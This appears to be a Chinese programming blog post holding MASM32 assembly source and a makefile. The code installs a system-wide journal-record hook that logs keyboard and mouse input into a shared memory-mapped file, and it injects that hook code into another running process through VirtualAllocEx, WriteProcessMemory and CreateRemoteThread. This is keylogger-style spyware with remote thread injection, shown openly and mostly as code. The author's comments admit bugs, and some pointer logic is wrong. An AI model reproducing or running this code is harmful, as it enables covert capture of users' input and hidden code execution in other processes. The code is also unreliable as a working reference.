系统播报

.386 .model flat, stdcall option casemap :none ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Include 文件定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; Equ 等值定义 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ICO_MAIN equ 1000 DLG_MAIN equ 1000 IDC_TEXT equ 1001 WM_HOOK equ WM_USER + 100h ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 数据段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .data? hWinMain dd ? hInstance dd ? hHook dd ? hFileMap dd ? lpMemory dd ? .const szMMFName db 'MMF',0 ;是这样写吗?应该是吧。 szErr db '创建文件内存映射失败',0 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 代码段 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> .code ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;设置共享的文件内存映射 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Sharing proc invoke OpenFileMapping,FILE_MAP_READ or FILE_MAP_WRITE,0,addr szMMFName .if ! eax invoke CreateFile,addr szMMFName,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,/ 0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 invoke CreateFileMapping,eax,NULL,PAGE_READWRITE,0,4096,addr szMMFName ;这个名字还是用得到 .if ! eax jmp @F .endif .endif mov hFileMap,eax invoke MapViewOfFile,eax,FILE_MAP_WRITE,0,0,0 ;这个只允许写,但是指针的位置还有待考虑 .if eax mov lpMemory,eax mov dword ptr [eax],0 ret .endif invoke CloseHandle,hFileMap @@: invoke MessageBox,hWinMain,addr szErr,NULL,MB_OK invoke EndDialog,hWinMain,-1 ret Sharing endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;Unshare it,Haha ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Unshare proc invoke UnmapViewOfFile,lpMemory invoke CloseHandle,hFileMap mov lpMemory,0 mov hFileMap,0 ret Unshare endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 钩子回调函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HookProc proc _dwCode,_wParam,_lParam invoke CallNextHookEx,hHook,_dwCode,_wParam,_lParam ;直接保存3个变量到文件内存映射中 call Sharing mov eax,_dwCode mov [lpMemory],eax add lpMemory,4 ;是+4吗? mov eax,_wParam mov [lpMemory],eax add lpMemory,4 mov eax,_lParam mov [lpMemory],eax xor eax,eax ret HookProc endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam mov eax,wMsg ;******************************************************************** .if eax == WM_CLOSE call Unshare invoke UnhookWindowsHookEx,hHook invoke EndDialog,hWnd,NULL ;******************************************************************** .elseif eax == WM_INITDIALOG push hWnd pop hWinMain invoke SetWindowsHookEx,WH_JOURNALRECORD,addr HookProc,hInstance,NULL .if eax mov hHook,eax .else invoke EndDialog,hWnd,NULL .endif ;******************************************************************** .else mov eax,FALSE ret .endif mov eax,TRUE ret _ProcDlgMain endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> start: invoke GetModuleHandle,NULL mov hInstance,eax invoke DialogBoxParam,eax,DLG_MAIN,NULL,offset _ProcDlgMain,NULL invoke ExitProcess,NULL ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> end start REMOTE_CODE_START equ this byte _lpLoadLibrary dd ? ;导入函数地址表 _lpGetProcAddress dd ? _lpGetModuleHandle dd ? _hWinMain dd ? _hInstance dd ? _hHook dd ? _hFileMap dd ? _lpMemory dd ? _szMMFName db 'MMF',0 ;是这样写吗?应该是吧。 _szErr db '创建文件内存映射失败',0 ;需要用到的库和函数 _lpDialogBoxParam dd ? _lpEndDialog dd ? _lpMessageBox dd ? _lpCallNextHookEx dd ? _lpSetWindowsHookEx dd ? _lpUnhookWindowsHookEx dd ? ;================================= _lpOpenFileMapping dd ? _lpCreateFile dd ? _lpCreateFileMapping dd ? _lpMapViewOfFile dd ? _lpCloseHandle dd ? _lpUnmapViewOfFile dd ? ;========================================= _szDllUser db 'User32.dll',0 _szDialogBoxParam db 'DialogBoxParam',0 ;u _szEndDialog db 'EndDialog',0 ;u _szMessageBox db 'MessageBox',0 ;u _szCallNextHookEx db 'CallNextHookEx',0 ;u _szSetWindowsHookEx db 'SetWindowsHookEx',0 ;u _szUnhookWindowsHookEx db 'UnhookWindowsHookEx',0,0 ;u ;=========================================================== _szDllKernel db 'Kernel32.dll',0 _szOpenFileMapping db 'OpenFileMapping',0 ;kernel32.lib _szCreateFile db 'CreateFile',0 ;kernel32.lib _szCreateFileMapping db 'CreateFileMapping',0 ;kernel32.lib _szMapViewOfFile db 'MapViewOfFile',0 ;kernel32.lib _szCloseHandle db 'CloseHandle',0 ;k _szUnmapViewOfFile db 'UnmapViewOfFile',0,0 ;k ;================================================================= _RemoteThread proc uses ebx edi esi lParam local @hModuleU local @hModuleK call @F @@: pop ebx sub ebx,offset @B ;******************************************************************** _invoke [ebx + _lpGetModuleHandle],NULL mov [ebx + _hInstance],eax lea eax,[ebx + offset _szDllUser] _invoke [ebx + _lpGetModuleHandle],eax mov @hModuleU,eax lea eax,[ebx + offset _szDllKernel] _invoke [ebx + _lpGetModuleHandle],eax mov @hModuleK,eax ;========================================= lea esi,[ebx + offset _szDialogBoxParam] lea edi,[ebx + offset _lpDialogBoxParam] .while TRUE _invoke [ebx + _lpGetProcAddress],@hModuleU,esi mov [edi],eax add edi,4 @@: lodsb or al,al jnz @B .break .if ! byte ptr [esi] .endw ;============================================= lea esi,[ebx + offset _szOpenFileMapping] lea edi,[ebx + offset _lpOpenFileMapping] .while TRUE _invoke [ebx + _lpGetProcAddress],@hModuleK,esi mov [edi],eax add edi,4 @@: lodsb or al,al jnz @B .break .if ! byte ptr [esi] .endw ;******************************************************************** lea ecx,[ebx + offset _szErr] _invoke [ebx + _lpMessageBox],[ebx + _hWinMain],ecx,NULL,MB_OK call _WinMain ret _RemoteThread endp _Sharing proc uses ebx edi esi call @F @@: pop ebx sub ebx,offset @B ;==================================== lea eax,[ebx + offset _szMMFName] _invoke [ebx + _lpOpenFileMapping],FILE_MAP_READ or FILE_MAP_WRITE,0,eax .if ! eax lea ecx,[ebx + offset _szMMFName] _invoke [ebx + _lpCreateFile],ecx,GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,/ 0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 _invoke [ebx + _lpCreateFileMapping],eax,NULL,PAGE_READWRITE,0,4096,ecx ;这个名字还是用得到 .if ! eax jmp @F .endif .endif mov [ebx + _hFileMap],eax _invoke [ebx + _lpMapViewOfFile],eax,FILE_MAP_WRITE,0,0,0 ;这个只允许写,但是指针的位置还有待考虑 .if eax mov [ebx + _lpMemory],eax ;mov dword ptr [eax],0 ret .endif _invoke [ebx + _lpCloseHandle],[ebx + _hFileMap] @@: lea ecx,[ebx + offset _szErr] _invoke [ebx + _lpMessageBox],[ebx + _hWinMain],ecx,NULL,MB_OK _invoke [ebx + _lpEndDialog],[ebx + _hWinMain],-1 ret _Sharing endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;Unshare it,Haha ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _Unshare proc uses ebx edi esi call @F @@: pop ebx sub ebx,offset @B ;=============================== _invoke [ebx + _lpUnmapViewOfFile],[ebx + _lpMemory] _invoke [ebx + _lpCloseHandle],[ebx + _hFileMap] mov [ebx + _lpMemory],0 mov [ebx + _hFileMap],0 ret _Unshare endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 钩子回调函数 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _HookProc proc uses ebx edi esi _dwCode,_wParam,_lParam call @F @@: pop ebx sub ebx,offset @B ;====================== _invoke [ebx + _lpCallNextHookEx],[ebx + _hHook],_dwCode,_wParam,_lParam ;直接保存3个变量到文件内存映射中 invoke _Sharing mov eax,_dwCode mov [ebx + _lpMemory],eax add _lpMemory,4 ;是+4吗? mov eax,_wParam mov [ebx + _lpMemory],eax add _lpMemory,4 mov eax,_lParam mov [ebx + _lpMemory],eax add _lpMemory,4 xor eax,eax ret _HookProc endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam call @F @@: pop ebx sub ebx,offset @B ;============================== mov eax,wMsg ;******************************************************************** .if eax == WM_CLOSE invoke _Unshare _invoke [ebx + _lpUnhookWindowsHookEx],[ebx + _hHook] _invoke [ebx + _lpEndDialog],[ebx + hWnd],NULL ;******************************************************************** .elseif eax == WM_INITDIALOG push hWnd pop _hWinMain lea eax,[ebx + offset _HookProc] _invoke [ebx + _lpSetWindowsHookEx],WH_JOURNALRECORD,eax,[ebx + _hInstance],NULL .if eax mov [ebx + _hHook],eax .else _invoke [ebx + _lpEndDialog],[ebx + hWnd],NULL .endif ;******************************************************************** .else mov eax,FALSE ret .endif mov eax,TRUE ret _ProcDlgMain endp _WinMain proc uses ebx edi esi,_lParam call @F @@: pop ebx sub ebx,offset @B ;======================== _invoke [ebx + _lpGetModuleHandle],NULL mov [ebx + _hInstance],eax lea ecx,[ebx + offset _ProcDlgMain] _invoke [ebx + _lpDialogBoxParam],eax,DLG_MAIN,NULL,ecx,NULL ret _WinMain endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> REMOTE_CODE_END equ this byte REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START

.386 .model flat,stdcall option casemap:none include windows.inc include user32.inc includelib user32.lib include kernel32.inc includelib kernel32.lib include Macro.inc ICO_MAIN equ 1000 DLG_MAIN equ 1000 WM_HOOK equ WM_USER + 100h .data? lpLoadLibrary dd ? lpGetProcAddress dd ? lpGetModuleHandle dd ? dwProcessID dd ? dwThreadID dd ? hProcess dd ? lpRemoteCode dd ? dwTmp dd ? .const szOK db 'OK了',0 szErrOpen db '无法打开远程线程!或无法植入!',0 szDesktopClass db 'Menu',0 szDesktopWindow db 'Menu',0 szDllKernel db 'kernel32.dll',0 szLoadLibrary db 'LoadLibraryA',0 szGetProcAddress db 'GetProcAddress',0 szGetModuleHandle db 'GetModuleHandleA',0 .code include RemoteCode.asm ;这样也行 start: invoke GetModuleHandle,addr szDllKernel mov ebx,eax invoke GetProcAddress,ebx,offset szLoadLibrary mov lpLoadLibrary,eax invoke GetProcAddress,ebx,offset szGetProcAddress mov lpGetProcAddress,eax invoke GetProcAddress,ebx,offset szGetModuleHandle mov lpGetModuleHandle,eax invoke FindWindow,addr szDesktopClass,addr szDesktopWindow invoke GetWindowThreadProcessId,eax,offset dwProcessID mov dwThreadID,eax invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE or PROCESS_VM_OPERATION,/ FALSE,dwProcessID .if eax mov hProcess,eax ;拿到了窗口类的句柄 invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,/ MEM_COMMIT,PAGE_EXECUTE_READWRITE .if eax mov lpRemoteCode,eax invoke WriteProcessMemory,hProcess,lpRemoteCode,/ offset REMOTE_CODE_START,REMOTE_CODE_LENGTH,offset dwTmp invoke WriteProcessMemory,hProcess,lpRemoteCode,/ offset lpLoadLibrary,sizeof dword*3,offset dwTmp ;两次写入,一次写入代码,另一次写3个函数的地址 ;再次写入的时候lpRemoteCode指针没有移位,直接写入RemoteCode的前3个dd中 ;就是我们要先执行的那个 invoke MessageBox,NULL,addr szOK,NULL,MB_OK or MB_ICONWARNING mov eax,lpRemoteCode add eax,offset _RemoteThread - offset REMOTE_CODE_START ;remote thread address,why?奥,线程开始地址 invoke CreateRemoteThread,hProcess,NULL,0,eax,0,0,NULL ;这里调试出错!!! .if ! eax invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING call @F .endif invoke CloseHandle,hProcess .endif .else invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING .endif @@: invoke ExitProcess,NULL end start

NAME = RemoteThd OBJS = $(NAME).obj RES = $(NAME).res LINK_FLAG = /subsystem:windows ML_FLAG = /c /coff $(NAME).exe: $(OBJS) $(RES) Link $(LINK_FLAG) $(OBJS) $(RES) .asm.obj: ml $(ML_FLAG) $< .rc.res: rc $< clean: del *.obj del *.res

 

 

你可能感兴趣的:(系统播报)